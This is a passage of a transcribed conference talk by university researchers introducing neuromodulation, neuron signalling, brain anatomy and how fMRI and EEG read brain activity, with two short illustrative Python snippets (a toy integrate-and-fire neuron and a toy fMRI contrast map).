the act of projecting into the brain in order to change your state, in much the same way you do with caffeine. Does anyone here use caffeine? Then you're very, very comfortable with neuromodulation; it's just that a Red Bull is much slower than electric current, and it would be nice to be able to have that jolt in the moment, and other things like that. I'd like to just point out that if you're interested in talking to us, our email, which will show up at the end again, is labx@ucf.edu. So, without further ado, Matt, tell them a little bit about what we're doing. All right. So, I would like to point out

that we actually submitted this paper several months before Elon Musk made his Neuralink announcement. However, the timing of that was very good for us. So, Elon, if you happen to be watching this, please send us a message; we'd love to chat with you. The reason I bring this up is that I think it shows how quickly we are moving towards consumer devices. In that announcement, Mr. Musk mentioned that they want to begin human trials within one year, so 2020 is the target date to begin human trials, and they want a consumer device within 10 years. We'll see if that happens, but we have some very large companies, such as Neuralink, Facebook, and others, that are actively working to try

to bring this onto the market. So, just a quick overview of how the nervous system works. At the very base level we have neurons, which are cells that communicate with one another. The way they communicate is that they get these upstream signals... sorry, let me use the laser. They get upstream signals from dendrites, which are connected to other neurons that are sending signals to the neuron, and after a certain threshold is met or exceeded, the cell body, which is the soma, the nucleus of that neuron, will decide to fire. And when it fires, it sends an electrical impulse down this thing called the axon, which carries that electrical impulse down to

the synapse, and that releases neurotransmitters across what's called the synaptic gap. Downstream from the synaptic gap is another dendrite, which is connected to another neuron, and so on and so forth. And that's how these messages get passed. The important thing here is the action potential, which is what happens when this electrical current travels down the axon. The reason that's important is that it's something we can detect, and we're going to talk about that more in just a minute. Now, a very quick, high-level overview of some of the anatomy of the brain. You can see different components here, but the three that I really want to focus on are the cortex, which I'll talk more about in a second,

but first the amygdala, which is this almond-shaped, orange-reddish thing here in the middle. The amygdala is responsible for emotional processing, for making these emotional or affective associations to stimuli. The reason this is important to what we're talking about today is that these associations can happen at a non-conscious or unconscious level. This is actually a lot of what protects us from danger, and it may play a very significant role in things like PTSD. There was a case study of someone who witnessed the 9/11 attacks and didn't really have any symptoms. But then a full year went by after those attacks, and suddenly, completely out of the blue, on a clear fall day when the air was very cool

and crisp, in a very similar way to the day the 9/11 attack happened, all of a sudden this gentleman was overwhelmed with a panic attack and didn't really understand why. One of the main reasons that may have occurred is that the amygdala had made this association between those weather conditions and danger, but he himself had no idea that his brain had made this association. This demonstrates how the brain can make associations between things without us having any conscious idea or understanding that it's doing so. In contrast to that, we have the hippocampus, which is this thing right behind the amygdala, and it's responsible for the consolidation of memory. This is what

transfers, basically, short-term memory into long-term memory. This happens a lot during sleep, and so you can actually suffer from something called sleep-induced amnesia, where if you stay up for several days in a row, you actually lose very significant chunks of time. One of the reasons for that is that your hippocampus is not consolidating those memories. Also, in brain trauma, we sometimes see that when people receive brain trauma, a concussion or something like that, if there's damage to the hippocampus, there's a very low probability that the person will have any memory of the event. Instead, they'll just have this chunk of lost time where they were doing something, and then the next thing they knew, they woke up somewhere

like in a hospital.
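The threshold-and-fire behavior described a moment ago can be sketched as a toy leaky integrate-and-fire model in Python. All the numbers here are arbitrary and purely illustrative; real neurons are electrochemical systems, not a three-line loop.

```python
# Toy integrate-and-fire neuron: upstream input accumulates on the cell body,
# and once the total meets or exceeds a threshold the neuron "fires" an
# action potential down the axon and resets.

def run_neuron(inputs, threshold=1.0, leak=0.5):
    """Return the indices of the time steps at which the neuron fires."""
    potential, spikes = 0.0, []
    for t, signal in enumerate(inputs):
        potential = potential * leak + signal  # leaky summation of dendrite input
        if potential >= threshold:             # threshold met or exceeded
            spikes.append(t)                   # action potential fired
            potential = 0.0                    # reset after firing
    return spikes

# Weak, steady input never crosses threshold; a burst of coincident input does.
assert run_neuron([0.2] * 10) == []
assert run_neuron([0.6, 0.6, 0.6]) == [2]
```

The spike train, the list of firing times, is the detectable signal the speakers referred to: it's the action potentials, not the individual inputs, that recording hardware picks up.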

Okay, so then coming back to the cortex. The cortex is this crinkly outer sheath of the brain that we typically think of when we think about the brain, and it's divided roughly into four regions. In this case, the pink area on the left-hand side would be the front, and that is the frontal lobe. Right behind that we've got the parietal lobe, which sits up on top; then the temporal lobe, which is right by the ear; and then the occipital lobe. The frontal lobe is responsible for what we call executive functions, which are things like attention, working memory, decision making, and reasoning. And incidentally, when someone's very

upset, it tends to drive their attentional focus towards whatever's upsetting them, but that also distracts us from things like being able to reason clearly. So if somebody is very emotionally upset, the chances of them being able to reason through something well are probably not so good. Likewise, fine motor control (I should specify, it's not just motor control, but fine motor control) is controlled by the premotor cortex, which is at the back end of this frontal lobe here. If you talk to any veterans, one of the first things that goes out the window in combat, when things are really intense, is the ability to perform fine motor functions. Your gross motor skills will still be there, but your fine motor skills aren't so

good, and that's one of the reasons. In the parietal lobe, we have the somatosensory cortex, which is your sense of your body. So when you experience touch sensations like on your hands or on your cheek or anywhere on your body, there is a corresponding representation of that part of your body in your somatosensory cortex, which is right here in the front of the parietal lobe. The temporal lobe is also known as the auditory cortex. This is what processes auditory information. It's also primarily responsible for long-term memory. And then finally in the back we have the occipital lobe, which is also known as the visual cortex, and this is what processes visual information. These don't operate in isolation. So if

you see something, that information goes from your eyes over here back through the optic nerve to the occipital lobe in the visual cortex, but then very quickly it moves forward to these other lobes. So if you see a baseball coming at you, that information is initially processed in your visual cortex, but your temporal lobe starts processing it, trying to recognize what that object is, and recognizes it as a baseball, while your parietal lobe is calculating the trajectory of it coming towards you and trying to understand where that baseball is spatially in relation to yourself. So, you know, looking at this, you can come back one. Oh, sure. Looking at this, have you ever tried to explain how a modern computer works to someone who's

naive? It's a strange moment, right? There's all of these layers and all these miracles happening. And you're like, no, listen, hardware and software. And to them, it's a screen and it's a tool. I'd like you to take just a second and think about your own brain. You don't do that very often. How many people here have held a brain in your hands? I don't care what type of brain. It's a fascinating thing, right? It's a lot smaller than the head. It's padded by a lot of things. Your own brain is about the size of a large grapefruit. So just think about that for a moment. It's sitting there between your ears right now. It's the reason that

you're looking at me and talking to me. That object is in fact an amalgam of many different pieces. And a change to any one of those pieces can have huge effects on what you can do and who you are. We've all read stories about that. Some of us have people in our families who have those issues. People who have issues with memory. It's very interesting, and very frightening, to look at a person and see how, although the whole is still them, pieces can change. And in fact, if you'll go forward a slide, this is something we write about a lot. And science fiction has been pulling on this thread our whole lives. And in fact,

one of the strange things about what we're going to talk to you about today is even deep experts in this field have trouble separating the science fiction and the poetry and the lore that we've been exposed to our whole lives from the reality that is changing every single day. So what I'd like you to do for a second is just think about where you get your ideas. You know, Ghost in the Shell is entirely about hacking brains. Gibson's Neuromancer books are deep in everybody's understanding in this community of what brains are and how they interact with technology and what that means. Right now, Iain Banks's books, like Look to Windward, are really what Musk

talks about when he talks about Neuralink. The neural lace there is what his link to this world is. And so one of the fascinating things that comes out of this is that it sometimes gets a little hard to separate the narrative, because the scientists are using the science fiction to inform the reality. So think about that as we talk about what's actually possible right now. Because what we're going to do now is get away from how this lump of jelly between your ears... If you've ever dissected a brain, it's like dissecting a cup of yogurt. It just reveals nothing. But how we can get into it and start to understand what's coming out of it, and then how we can manipulate that. So let's talk a little bit about

sort of the constituent pieces here. And so if we're reading from the brain, there are really two types of signal that we can detect. One is blood flow. And so the neurons I talked about earlier, they're just like muscle cells, really. When they're working, they're consuming oxygen, right? So they need that replenishment of oxygenated hemoglobin. And so what we can do is we can actually detect when that starts to differentiate and where in the brain that differentiation is happening. And so that creates something called a BOLD signal, for blood-oxygen-level-dependent, that we can then detect. And you can see examples of that on the left. Likewise, when those neurons are firing, they're producing these electrical currents, and that's also detectable by an EEG like what I'm

wearing right now. So consider how you would determine what a computer is doing by watching its thermal signatures or by watching how much energy it uses in any given place. You might not be able to tell much, but you might be able to tell that when it's doing visually complex geometry, certain parts heat up and those are related to that. It's an association game when you start using this. In fact, what you're looking at here on the bottom is a great study. On the left are people being tickled and laughing. And in the center are people being tickled and trying to inhibit their laughter. Stop. And on the right are people voluntarily laughing at funny

images. And you can immediately look at the areas where the most blood is used and start to draw associations, right? You can say, oh, well, the difference between tickling and laughter and tickling and inhibition might be the things you use to inhibit things, right? So this is the sort of thing that scientists use to tease this apart. Electrical signals
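The association game the speakers describe for the tickling study, comparing where blood flow differs between two conditions and treating the difference as the interesting region, can be sketched as a toy contrast analysis. This is purely illustrative: the grid size, condition names, and "injected" region are invented for the example, and real fMRI analysis works on 3D volumes with proper statistics, not a simple subtraction.

```python
import numpy as np

# Toy "activation maps": mean BOLD response per voxel for two conditions,
# on a small 8x8 grid (real fMRI volumes are 3D and far larger).
rng = np.random.default_rng(0)
baseline = rng.normal(0.0, 0.1, size=(8, 8))

tickle_laugh = baseline.copy()     # tickled, laughing freely
tickle_inhibit = baseline.copy()   # tickled, suppressing laughter

# Pretend a hypothetical "inhibition" region (rows 1-2, cols 5-6)
# lights up only when subjects suppress their laughter.
tickle_inhibit[1:3, 5:7] += 1.0

# Contrast map: where does inhibition differ from free laughter?
contrast = tickle_inhibit - tickle_laugh

# Threshold to find candidate voxels driving the difference.
active = np.argwhere(contrast > 0.5)
print(active)  # the four voxels of the injected "inhibition" region
```

Because both maps share the same baseline, the subtraction isolates exactly the injected region; in real data the two conditions have independent noise, which is why researchers average over many trials and subjects before drawing the kind of association described above.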